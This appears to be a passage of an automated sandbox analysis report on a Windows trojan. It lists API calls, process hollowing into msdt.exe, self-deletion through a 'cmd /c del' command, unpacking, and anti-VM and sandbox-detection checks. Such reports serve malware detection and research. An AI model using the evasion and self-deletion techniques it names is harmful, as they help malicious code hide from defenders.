          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F341205_2_00F34120
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1F9005_2_00F1F900
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4EBB05_2_00F4EBB0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2841F5_2_00F2841F
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2D5E05_2_00F2D5E0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE1D555_2_00FE1D55
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F10D205_2_00F10D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A015_2_04AF20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADB09015_2_04ADB090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD841F15_2_04AD841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B8100215_2_04B81002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF258115_2_04AF2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADD5E015_2_04ADD5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC0D2015_2_04AC0D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE412015_2_04AE4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACF90015_2_04ACF900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B91D5515_2_04B91D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE6E3015_2_04AE6E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFEBB015_2_04AFEBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277C34315_2_0277C343
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277B8D615_2_0277B8D6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277B8D315_2_0277B8D3
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277C98B15_2_0277C98B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_02762FB015_2_02762FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_02768C9015_2_02768C90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_02768C8B15_2_02768C8B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_02762D9015_2_02762D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_02762D8C15_2_02762D8C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 04ACB150 appears 35 times
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: String function: 00F1B150 appears 31 times
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_004185F0 NtCreateFile,5_2_004185F0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_004186A0 NtReadFile,5_2_004186A0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00418720 NtClose,5_2_00418720
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_004187D0 NtAllocateVirtualMemory,5_2_004187D0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_004185EB NtCreateFile,5_2_004185EB
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0041871A NtClose,5_2_0041871A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_004187CA NtAllocateVirtualMemory,5_2_004187CA
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F598F0 NtReadVirtualMemory,LdrInitializeThunk,5_2_00F598F0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59860 NtQuerySystemInformation,LdrInitializeThunk,5_2_00F59860
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59840 NtDelayExecution,LdrInitializeThunk,5_2_00F59840
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F599A0 NtCreateSection,LdrInitializeThunk,5_2_00F599A0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_00F59910
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59A50 NtCreateFile,LdrInitializeThunk,5_2_00F59A50
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59A20 NtResumeThread,LdrInitializeThunk,5_2_00F59A20
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59A00 NtProtectVirtualMemory,LdrInitializeThunk,5_2_00F59A00
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F595D0 NtClose,LdrInitializeThunk,5_2_00F595D0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59540 NtReadFile,LdrInitializeThunk,5_2_00F59540
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F596E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_00F596E0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_00F59660
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59FE0 NtCreateMutant,LdrInitializeThunk,5_2_00F59FE0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F597A0 NtUnmapViewOfSection,LdrInitializeThunk,5_2_00F597A0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59780 NtMapViewOfSection,LdrInitializeThunk,5_2_00F59780
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59710 NtQueryInformationToken,LdrInitializeThunk,5_2_00F59710
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F598A0 NtWriteVirtualMemory,5_2_00F598A0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F5B040 NtSuspendThread,5_2_00F5B040
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59820 NtEnumerateKey,5_2_00F59820
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F599D0 NtCreateProcessEx,5_2_00F599D0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59950 NtQueueApcThread,5_2_00F59950
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59A80 NtOpenDirectoryObject,5_2_00F59A80
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59A10 NtQuerySection,5_2_00F59A10
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F5A3B0 NtGetContextThread,5_2_00F5A3B0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59B00 NtSetValueKey,5_2_00F59B00
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F595F0 NtQueryInformationFile,5_2_00F595F0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59560 NtWriteFile,5_2_00F59560
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F5AD30 NtSetContextThread,5_2_00F5AD30
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59520 NtWaitForSingleObject,5_2_00F59520
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F596D0 NtCreateKey,5_2_00F596D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09860 NtQuerySystemInformation,LdrInitializeThunk,15_2_04B09860
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09840 NtDelayExecution,LdrInitializeThunk,15_2_04B09840
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B099A0 NtCreateSection,LdrInitializeThunk,15_2_04B099A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B095D0 NtClose,LdrInitializeThunk,15_2_04B095D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09910 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_04B09910
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09540 NtReadFile,LdrInitializeThunk,15_2_04B09540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B096E0 NtFreeVirtualMemory,LdrInitializeThunk,15_2_04B096E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B096D0 NtCreateKey,LdrInitializeThunk,15_2_04B096D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09660 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_04B09660
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09650 NtQueryValueKey,LdrInitializeThunk,15_2_04B09650
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A50 NtCreateFile,LdrInitializeThunk,15_2_04B09A50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09780 NtMapViewOfSection,LdrInitializeThunk,15_2_04B09780
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09FE0 NtCreateMutant,LdrInitializeThunk,15_2_04B09FE0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09710 NtQueryInformationToken,LdrInitializeThunk,15_2_04B09710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B098A0 NtWriteVirtualMemory,15_2_04B098A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B098F0 NtReadVirtualMemory,15_2_04B098F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09820 NtEnumerateKey,15_2_04B09820
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0B040 NtSuspendThread,15_2_04B0B040
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B095F0 NtQueryInformationFile,15_2_04B095F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B099D0 NtCreateProcessEx,15_2_04B099D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0AD30 NtSetContextThread,15_2_04B0AD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09520 NtWaitForSingleObject,15_2_04B09520
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09560 NtWriteFile,15_2_04B09560
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09950 NtQueueApcThread,15_2_04B09950
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A80 NtOpenDirectoryObject,15_2_04B09A80
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A20 NtResumeThread,15_2_04B09A20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09610 NtEnumerateValueKey,15_2_04B09610
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A10 NtQuerySection,15_2_04B09A10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A00 NtProtectVirtualMemory,15_2_04B09A00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09670 NtQueryInformationProcess,15_2_04B09670
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0A3B0 NtGetContextThread,15_2_04B0A3B0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B097A0 NtUnmapViewOfSection,15_2_04B097A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09730 NtQueryVirtualMemory,15_2_04B09730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0A710 NtOpenProcessToken,15_2_04B0A710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09B00 NtSetValueKey,15_2_04B09B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09770 NtSetInformationFile,15_2_04B09770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0A770 NtOpenThread,15_2_04B0A770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09760 NtOpenProcess,15_2_04B09760
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027786A0 NtReadFile,15_2_027786A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_02778720 NtClose,15_2_02778720
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027787D0 NtAllocateVirtualMemory,15_2_027787D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027785F0 NtCreateFile,15_2_027785F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277871A NtClose,15_2_0277871A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027787CA NtAllocateVirtualMemory,15_2_027787CA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027785EB NtCreateFile,15_2_027785EB
          Source: divpCHa0h7.exeBinary or memory string: OriginalFilename vs divpCHa0h7.exe
          Source: divpCHa0h7.exe, 00000001.00000000.243614905.0000000000692000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDateTimeFormatFla.exe6 vs divpCHa0h7.exe
          Source: divpCHa0h7.exe, 00000001.00000002.271111819.00000000071F0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll< vs divpCHa0h7.exe
          Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmpBinary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs divpCHa0h7.exe
          Source: divpCHa0h7.exeBinary or memory string: OriginalFilename vs divpCHa0h7.exe
          Source: divpCHa0h7.exe, 00000003.00000000.261988052.0000000000142000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDateTimeFormatFla.exe6 vs divpCHa0h7.exe
          Source: divpCHa0h7.exeBinary or memory string: OriginalFilename vs divpCHa0h7.exe
          Source: divpCHa0h7.exe, 00000004.00000000.263958502.00000000003A2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDateTimeFormatFla.exe6 vs divpCHa0h7.exe
          Source: divpCHa0h7.exe, 00000005.00000002.364340178.0000000002E40000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs divpCHa0h7.exe
          Source: divpCHa0h7.exe, 00000005.00000000.264881846.0000000000402000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDateTimeFormatFla.exe6 vs divpCHa0h7.exe
          Source: divpCHa0h7.exe, 00000005.00000002.363189581.000000000100F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs divpCHa0h7.exe
          Source: divpCHa0h7.exeBinary or memory string: OriginalFilenameDateTimeFormatFla.exe6 vs divpCHa0h7.exe
          Source: divpCHa0h7.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: divpCHa0h7.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: divpCHa0h7.exeVirustotal: Detection: 16%
          Source: divpCHa0h7.exeReversingLabs: Detection: 17%
          Source: divpCHa0h7.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\divpCHa0h7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\divpCHa0h7.exe 'C:\Users\user\Desktop\divpCHa0h7.exe'
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\divpCHa0h7.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exeJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exeJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exeJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\divpCHa0h7.exe'Jump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeFile created: C:\Users\user\AppData\Local\GottschalksJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@12/1@8/5
          Source: C:\Users\user\Desktop\divpCHa0h7.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: divpCHa0h7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: divpCHa0h7.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: divpCHa0h7.exe, 00000005.00000002.364340178.0000000002E40000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: divpCHa0h7.exe, 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, msdt.exe, 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: divpCHa0h7.exe, msdt.exe
          Source: Binary string: msdt.pdb source: divpCHa0h7.exe, 00000005.00000002.364340178.0000000002E40000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\divpCHa0h7.exeUnpacked PE file: 5.2.divpCHa0h7.exe.400000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs .text:ER;
          .NET source code contains potential unpackerShow sources
          Source: divpCHa0h7.exe, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 1.0.divpCHa0h7.exe.690000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 1.2.divpCHa0h7.exe.690000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.divpCHa0h7.exe.140000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.2.divpCHa0h7.exe.140000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.divpCHa0h7.exe.3a0000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.2.divpCHa0h7.exe.3a0000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.divpCHa0h7.exe.400000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 1_2_006971C7 push 00000014h; iretd 1_2_006973C0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 1_2_0106203B push ebx; retf 1_2_0106207A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 3_2_001471C7 push 00000014h; iretd 3_2_001473C0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 4_2_003A71C7 push 00000014h; iretd 4_2_003A73C0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0041B832 push eax; ret 5_2_0041B838
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0041B83B push eax; ret 5_2_0041B8A2
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0041B89C push eax; ret 5_2_0041B8A2
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0041B7E5 push eax; ret 5_2_0041B838
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F6D0D1 push ecx; ret 5_2_00F6D0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B1D0D1 push ecx; ret 15_2_04B1D0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277B832 push eax; ret 15_2_0277B838
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277B83B push eax; ret 15_2_0277B8A2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277B89C push eax; ret 15_2_0277B8A2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277B7E5 push eax; ret 15_2_0277B838
          Source: initial sampleStatic PE information: section name: .text entropy: 7.77424395601

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del 'C:\Users\user\Desktop\divpCHa0h7.exe'
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del 'C:\Users\user\Desktop\divpCHa0h7.exe'Jump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 1.2.divpCHa0h7.exe.2b01658.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: divpCHa0h7.exe PID: 3240, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\divpCHa0h7.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\divpCHa0h7.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000002768614 second address: 000000000276861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 00000000027689AE second address: 00000000027689B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\divpCHa0h7.exe TID: 2540Thread sleep time: -30091s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exe TID: 2840Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5240Thread sleep time: -35000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_004088E0 rdtsc 5_2_004088E0
